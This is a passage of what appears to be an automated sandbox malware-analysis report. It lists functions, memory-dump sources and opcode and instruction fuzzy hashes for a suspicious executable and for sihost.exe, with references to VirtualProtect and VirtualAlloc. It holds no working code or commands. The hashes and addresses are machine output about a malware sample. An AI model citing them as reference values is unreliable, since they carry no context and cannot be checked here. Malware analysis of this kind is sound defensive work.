Instruction Fuzzy Hash: E3B01200E6740F00E42433FA089206470405B4C700FC62170D40C40091984D22A802A3

Function 00007FFD9BC96B3C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.2354660360.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9bc90000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06090942865dbdd4ebe6fc9e9eee62cce78f28aab3d2a1cf564b5ae0c048cdb4
Instruction ID: 37a8178699603e51b88bf3f27c5f9ef5c272b87d8fdc55947c6c43973bbd95c6
Opcode Fuzzy Hash: 06090942865dbdd4ebe6fc9e9eee62cce78f28aab3d2a1cf564b5ae0c048cdb4
Instruction Fuzzy Hash: 82C04C41F1F34B66F73116F0487007D05504B053407160571A16ACA1E7ED58A9447255

Function 00007FFD9BC91B11 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002F.00000002.2354660360.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9bc90000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4916bb3f4b1952e65bad03312efc5a42f3f4bc84655f7e7f8ba84756c785ee6
Instruction ID: fdfccb87c5b84ff22eb9015e85e9f7e98dbd9485e6939363b2d6801b4f448eb6
Opcode Fuzzy Hash: f4916bb3f4b1952e65bad03312efc5a42f3f4bc84655f7e7f8ba84756c785ee6
Instruction Fuzzy Hash: 37B01200F0E24BB3F13400F004B603D00420F05784B230A30F20B462E7ED4C3B402290

Non-executed Functions

Function 00007FFD9B8A09B0 Relevance: 5.2, Strings: 4, Instructions: 184COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9B8A0B3E
"s9, xrefs: 00007FFD9B8A0B46
!k9, xrefs: 00007FFD9B8A0B4E
c9, xrefs: 00007FFD9B8A0B56

Memory Dump Source

Source File: 0000002F.00000002.2246589185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_7ffd9b8a0000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 697f4a477993827cdc9dbd17ca488a2af8e0e91b4ff7e092f293205db2dca7d0
Instruction ID: 795ac1c486d2a912fc26bc7cb85c52087bea6cecf9be32fac37c0c8812c099fe
Opcode Fuzzy Hash: 697f4a477993827cdc9dbd17ca488a2af8e0e91b4ff7e092f293205db2dca7d0
Instruction Fuzzy Hash: 8E419E87B1947A85E31E37FD79299FC6B44CF85339B0843B7E05E8A0D75C88608292E5

Analysis Process: steBCuuQsIefcKufvgYbRBCxKhPR.exePID: 5496, Parent PID: 7500COMMON

Executed Functions

Function 00007FFD9B880D7C Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aebb3590021293f1bff7dbdafe2ff862b7e589b1ba4ac8815baec6ba8e248e5
Instruction ID: 5a9b9155e7e4edb79f856a5411f838571d78a078652e1505cc21c076413910f5
Opcode Fuzzy Hash: 4aebb3590021293f1bff7dbdafe2ff862b7e589b1ba4ac8815baec6ba8e248e5
Instruction Fuzzy Hash: 0A91F271A18E9D4FE798EB6898797A97FE1FF99300F8000BAD059C72D6DB781801C741

Function 00007FFD9B88090D Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c876332c21ac22479cc515371752bfb804d8bc6bc5c7220c77a24f6b4712720
Instruction ID: a74447e26f9ed7f0a3242976f989705980bd72275f56a1ac4c80ebf8aa219da8
Opcode Fuzzy Hash: 8c876332c21ac22479cc515371752bfb804d8bc6bc5c7220c77a24f6b4712720
Instruction Fuzzy Hash: 83414C22B0CD694FE319B7BC74AA9F87791EF49324B0404BBD05EC71E7DD286C428284

Function 00007FFD9B880908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 768f4000c236e6a1a9ee49182d320246739de45a474351e58a51e0eca55a1235
Instruction ID: f18b1a43996f7c00bed5a753dc62b517c104362e420f31298035b4a3ce26a0cf
Opcode Fuzzy Hash: 768f4000c236e6a1a9ee49182d320246739de45a474351e58a51e0eca55a1235
Instruction Fuzzy Hash: CB21E63130DC194FE768EB4CE88ADB977D1EF5932170101BAE59AC7135DA21EC8287C1

Function 00007FFD9B880998 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f9d620646e441b668b7b4a80081d0fd42651b60fe9c445ae063bac5833c789b
Instruction ID: 37b7c0355efec75a745ca1fc92077c96c9adc0e8d31aacdfd6246aa28c34d506
Opcode Fuzzy Hash: 6f9d620646e441b668b7b4a80081d0fd42651b60fe9c445ae063bac5833c789b
Instruction Fuzzy Hash: 7B216810B1DD5D0FE358F76C586A67977D2EF9C311B8100B9E45EC32E6DC34AC814281

Function 00007FFD9B880C25 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47bc13679ecb1a0b1de9c0c685c37ceb137d2021220c73da2d7565bf5ccb14a3
Instruction ID: 35ab48b562eb4715fb3d236b2eec6f3433bdff1fc928765f0f63f651a15914ff
Opcode Fuzzy Hash: 47bc13679ecb1a0b1de9c0c685c37ceb137d2021220c73da2d7565bf5ccb14a3
Instruction Fuzzy Hash: 3F318D31F1DA4E8FE726ABA898251EC7B60EF85710F0545F7C068CB1E3D9382A868750

Function 00007FFD9B885575 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ed3f8fbde865a9e8f1864931597ef6b482ad96cf0f69083780b183e8ff7193
Instruction ID: 3bef09e5e4d2bab45f9df968659d39848851c6e5d869711432859de5adf0e863
Opcode Fuzzy Hash: 45ed3f8fbde865a9e8f1864931597ef6b482ad96cf0f69083780b183e8ff7193
Instruction Fuzzy Hash: 7121CB30E0891D8FDB65DB04C864BED73B2FB98311F5541A9D00ED72A0CA39AE85CB41

Function 00007FFD9B880C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df7ea1e93d3001605bb85ac005902c92487997a5d8ae727007963e3b665d3acd
Instruction ID: 92be3613367467f61bc34c9909895d7c7a3cba0fc9e9fbb1141e6a77ef4e5d7f
Opcode Fuzzy Hash: df7ea1e93d3001605bb85ac005902c92487997a5d8ae727007963e3b665d3acd
Instruction Fuzzy Hash: 27110635F1EA8D8FE722DFA8886119C7FB1EF45710F0645F7C094DB1A2D5382A468790

Function 00007FFD9B880C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0281e1c1104c106a3f4ab42e03cb3b0f393e5584505c9d690a32a5e710b57314
Instruction ID: 60ea19345c8d6a5271ac9c38b3d2019158e94ed86a4275afa27ee87e9b512aac
Opcode Fuzzy Hash: 0281e1c1104c106a3f4ab42e03cb3b0f393e5584505c9d690a32a5e710b57314
Instruction Fuzzy Hash: 54110835F1EA8D8FE722DFA8886019C7FB1EF46710F0645F7C054DB1A2D5386A458780

Function 00007FFD9B880C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02da0d2ca788945c465950477553cd708c119f30eabb67c977afcf024baad171
Instruction ID: 72b129201cff239e4bf6d55c69ee512572287141feafca68e68c32430fde876d
Opcode Fuzzy Hash: 02da0d2ca788945c465950477553cd708c119f30eabb67c977afcf024baad171
Instruction Fuzzy Hash: 6201D231E1EA8D8FE722DFA8886009C7FB1EF06710F0641F7C064DB2A2D9386A458780

Function 00007FFD9B880C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b25e55aa23a381921188f84a7e81e043e873f9030ad5f51468fd229b7fd355
Instruction ID: c1f4d8159e1b5bb2532f6106c265e9f54934bf92d52fff45a72e6b062700f17f
Opcode Fuzzy Hash: d8b25e55aa23a381921188f84a7e81e043e873f9030ad5f51468fd229b7fd355
Instruction Fuzzy Hash: ED01B130E1EA8D8FE722DBA8886409C7FB1EF06700F1541F7C064DB2A2D9386A448740

Function 00007FFD9B880B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1561a187e9303dfe62e218c5dbc0fc9a5e4efe5113f169ce7487fd134a46d947
Instruction ID: fffac17bae2a277a1fa8ebfabcb37023024ac906f96326ff2e9fbc8144eff237
Opcode Fuzzy Hash: 1561a187e9303dfe62e218c5dbc0fc9a5e4efe5113f169ce7487fd134a46d947
Instruction Fuzzy Hash: 0AE0AB3E68A944CFC3409B38ECE04D4BB50FB1220A75616FAC088C2412D312085CC700

Function 00007FFD9B880CB9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7922d6def02874dfc147922b92a260acd76b69d0a8d58bca03707c395560585
Instruction ID: 8abdc6d1686e0cee6a40c26bd81f2b3432e32b7966220fa37a9695949539f7cb
Opcode Fuzzy Hash: e7922d6def02874dfc147922b92a260acd76b69d0a8d58bca03707c395560585
Instruction Fuzzy Hash: 01F0BE30B1AA4ACBE724DF84C8A47E977A1FF55701F1442B6D018872E5DA786AC4CB80

Function 00007FFD9B880845 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcdf8d2143fb10fbe468d3a44469be5f695cfc3bcbe6248606ffbbae30b19175
Instruction ID: 67ddf21f72b03f6472dd666da616043d7bf463450c7e79bd4c0f51142c935437
Opcode Fuzzy Hash: fcdf8d2143fb10fbe468d3a44469be5f695cfc3bcbe6248606ffbbae30b19175
Instruction Fuzzy Hash: 3ED02E3864AA884FCA00E37CD89209C3F70EB4B22078500E3C448CA0B3C12988CBC351

Function 00007FFD9B8845FC Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd36e6fc6b36c30c0fb5851be205f8466c5a0097b24f31cce2ac1217ff57279
Instruction ID: 7f4e14577a22d221dd7fa4e15f577de316b35efbc4baecf403f5724ee2e923c8
Opcode Fuzzy Hash: 3cd36e6fc6b36c30c0fb5851be205f8466c5a0097b24f31cce2ac1217ff57279
Instruction Fuzzy Hash: 45E0ED20F1991E4BF7B4E794C4603BD6252AF98300F1241B4D49D933E6DD386E818641

Function 00007FFD9B8806A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b8bec1d0bcfa389f5b2ecb8a0f5e376f974fc9dae17812f5364974a72f694e
Instruction ID: 352637380ad53bf01ca7ce7aa8b190a17dae57fe942856af1635701e362e47e5
Opcode Fuzzy Hash: 15b8bec1d0bcfa389f5b2ecb8a0f5e376f974fc9dae17812f5364974a72f694e
Instruction Fuzzy Hash: C6C04C05F6BE1F43F835B7EE98660ACA1405FDDB10FE70172D56C400F19C6E22D50196

Function 00007FFD9B8857FF Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66bf7c6ae23a0182596d5198a9e1d6deb9cfe4bc440bf8cfa7e09e8ea30a34d7
Instruction ID: 48e766f8ce4386960aabc6d845ae1ec99a867d3b22d1131c4fcfde6b5848b4c6
Opcode Fuzzy Hash: 66bf7c6ae23a0182596d5198a9e1d6deb9cfe4bc440bf8cfa7e09e8ea30a34d7
Instruction Fuzzy Hash: B5C04C01F18C5B47E35A7314443167D84539F58744FD545B4E05E873CEDD6C5B0202C7

Function 00007FFD9B88463D Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6227bdf1b355d9670b3c8ee5a5e7b7cca4c2410154708965bc4911a497d0083a
Instruction ID: cca59d4c4bf6ef6471aefd05369d68260e861f8a39c5306f1d556f7708c09bf5
Opcode Fuzzy Hash: 6227bdf1b355d9670b3c8ee5a5e7b7cca4c2410154708965bc4911a497d0083a
Instruction Fuzzy Hash: DEC00241F1EA5B47F2B163E4853537A16925F1A210F1B4175D96D861E2DC2C6E011155

Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6931adde3764e7badb10e04db24da8f7e22cbed531248c5837db462aa8399557
Instruction ID: 5d827a73773013b9744d2e03b91c01752a39fd185c3da01bdb484c17f09e80e4
Opcode Fuzzy Hash: 6931adde3764e7badb10e04db24da8f7e22cbed531248c5837db462aa8399557
Instruction Fuzzy Hash: 28B01200E67C0F02E42433FA0C5206470405F8C200FC30070D42C400A1985E12A402C2

Non-executed Functions

Function 00007FFD9B8809B0 Relevance: 5.2, Strings: 4, Instructions: 184COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FFD9B880B3E
c9, xrefs: 00007FFD9B880B56
!k9, xrefs: 00007FFD9B880B4E
"s9, xrefs: 00007FFD9B880B46

Memory Dump Source

Source File: 00000030.00000002.2235818997.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_48_2_7ffd9b880000_steBCuuQsIefcKufvgYbRBCxKhPR.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 1931fed9d5955858e459f9e6a1d3be370fd593a213336ddd0d7c47c48c9b52a9
Instruction ID: 8e77ad9ef9a3a69b05557b2ad2f2f46d13ee763d9d32d0e1bfc379199c2ded3e
Opcode Fuzzy Hash: 1931fed9d5955858e459f9e6a1d3be370fd593a213336ddd0d7c47c48c9b52a9
Instruction Fuzzy Hash: 4641FF87B1843385E21F33FD792A9EC5B40CF8423CB0846B3E16E8A0C75C88648792E5

Analysis Process: sihost.exePID: 7528, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B8E16EA Relevance: .4, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b33ba89bc0aa670d20ccb8df9bea4170bb140762f24eba87ef01eab9695e6c
Instruction ID: e220400d92312a82c2bea2099df68d8c054732d9dd21b956de9bba91c6800e1d
Opcode Fuzzy Hash: 22b33ba89bc0aa670d20ccb8df9bea4170bb140762f24eba87ef01eab9695e6c
Instruction Fuzzy Hash: C6B1F021A1E6AE0BE32D77594C520B07791EF96305B5A43BEC8DB870ABDD28A51383C1

Function 00007FFD9B8B0D7C Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8b0000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a526ca7b31182dec74b655e7b7171076fa892f91da7fa32fd8f037fd8af46330
Instruction ID: 9be354dd83e5edb27b3ae2266b3ba52ed4b1a90876b11919306a55727d7258d9
Opcode Fuzzy Hash: a526ca7b31182dec74b655e7b7171076fa892f91da7fa32fd8f037fd8af46330
Instruction Fuzzy Hash: 0B910471A18A9E8FE798DB688865BA9BFE1FF99310F4000BED049D72E6DF781411C741

Function 00007FFD9B8BB38A Relevance: 1.6, APIs: 1, Instructions: 143
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9B8BB46D

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8b4000_sihost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a64a0c2a854e1330dc0aca72090d6cd5491cade465dee0887c07575b7dd243a0
Instruction ID: ee25eab5261d3a36566bf0349f55a62b0097d9a3af99cfdd65a1df22e071b7fa
Opcode Fuzzy Hash: a64a0c2a854e1330dc0aca72090d6cd5491cade465dee0887c07575b7dd243a0
Instruction Fuzzy Hash: 2941083190D7894FDB1D9BA89C166E97FE0EF56321F0442BFD099C3193DA746406C792

Function 00007FFD9B8BC215 Relevance: 1.5, APIs: 1, Instructions: 228
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8b4000_sihost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21a53735caf08578c3d7cfe7914c1e585863712e7e5dae738a1bcad2bf6f32a
Instruction ID: a56d1b7644e7a3609427fdfb01f4481301a2248c9a0a08fdee6b32b2f91d9082
Opcode Fuzzy Hash: f21a53735caf08578c3d7cfe7914c1e585863712e7e5dae738a1bcad2bf6f32a
Instruction Fuzzy Hash: 6F512B31B1CA5D4FD71CE77C981A6B97BE1EB99310F4041BED04DC32A3DD24A8428791

Function 00007FFD9B8BC361 Relevance: 1.4, APIs: 1, Instructions: 124
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD9B8BC414

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8b4000_sihost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b196b663b2bba5d1e6182b2f680886b118d158f3a65a108daa451d0ce5459107
Instruction ID: 3752346e41b09507d831eceb3e5a7a9615cb669ba7d69b25a10d4d16f637d8b0
Opcode Fuzzy Hash: b196b663b2bba5d1e6182b2f680886b118d158f3a65a108daa451d0ce5459107
Instruction Fuzzy Hash: 7131E931A0CB8C4FDB1DEB68981A6F97BF0EF5A321F04426FD049C3152DA646956CBC1

Function 00007FFD9B8EB2BE Relevance: 1.3, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00007FFD9B8EB2C3

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: aa24038122dc790f01d909655ab25812f5be199fbd19e68ee7dad6bfb2a31e47
Instruction ID: 6e238e73c0ee50300d1178a967d3d2bcc048319bacc4f73d31fb16d331e1a17f
Opcode Fuzzy Hash: aa24038122dc790f01d909655ab25812f5be199fbd19e68ee7dad6bfb2a31e47
Instruction Fuzzy Hash: E221F451B0DA8E0AE79DB7A854F66B876C6EF9C300F5901BAD04DC31E7DD28A8468341

Function 00007FFD9B8EA439 Relevance: 1.3, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9B8EA456

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 3311ec6dccd9dd8387f26a28588f811f3ab65195e17782944078623b4c71457b
Instruction ID: 9d14b2d6bd315543008c5bdb0e0ff767c08370469145a075a19a59444e7c8683
Opcode Fuzzy Hash: 3311ec6dccd9dd8387f26a28588f811f3ab65195e17782944078623b4c71457b
Instruction Fuzzy Hash: 0BF0656150F7C44FC71AAB3588698547FA0EF6760174A52EFC045CF1A3EA2DD885C701

Function 00007FFD9B8EA3A9 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9B8EA3C6

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: d65649821c420d0dd55742eb586570182d281457ec0a56b661a7d3c49f63e68b
Instruction ID: aae90e249a1188edf8f6ebe457d58f471694147efd10106a128e329f4c506aa7
Opcode Fuzzy Hash: d65649821c420d0dd55742eb586570182d281457ec0a56b661a7d3c49f63e68b
Instruction Fuzzy Hash: F4E06D7160F7C44FC71AAA348869454BFA0EF6720174A56EFC046CF1A3EA2DD889C701

Function 00007FFD9B8C3B99 Relevance: 1.3, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFD9B8C3BB6

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8c0000_sihost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: b8134ac2b8fd0df2d4b638922048e9b745f6a432594fc7e1ddd98a0722ed0e98
Instruction ID: 85d6b17da611dd3a3cadb70e3a04cdcfbe3e84acbeac7d1d315a665c5ff93a11
Opcode Fuzzy Hash: b8134ac2b8fd0df2d4b638922048e9b745f6a432594fc7e1ddd98a0722ed0e98
Instruction Fuzzy Hash: 28E06D61A4E7C44FCB16AA748869854BFA0EF6721174A41EFC086CF1A3EA2D8889C711

Function 00007FFD9B8EAC69 Relevance: 1.3, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9B8EAC86

Memory Dump Source

Source File: 00000037.00000002.2311402852.00007FFD9B8E1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_55_2_7ffd9b8e1000_sihost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: b03e51b8d1c549c143056593482822ef99f3fa8727d0cf5849aafd64646aefc4
Instruction ID: 6e39f699e87b9c7568a78121313361861c54ff9e616006c09c05220b7cdb601d
Opcode Fuzzy Hash: b03e51b8d1c549c143056593482822ef99f3fa8727d0cf5849aafd64646aefc4
Instruction Fuzzy Hash: 47E0ED6154F3D45FCB56AB7588658443FA0AE6B61074A41DEC085CB1B3E62D9945C701

Function 00007FFD9B8E22C9 Relevance: 1.3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9B8E22E6

Memory Dump Source

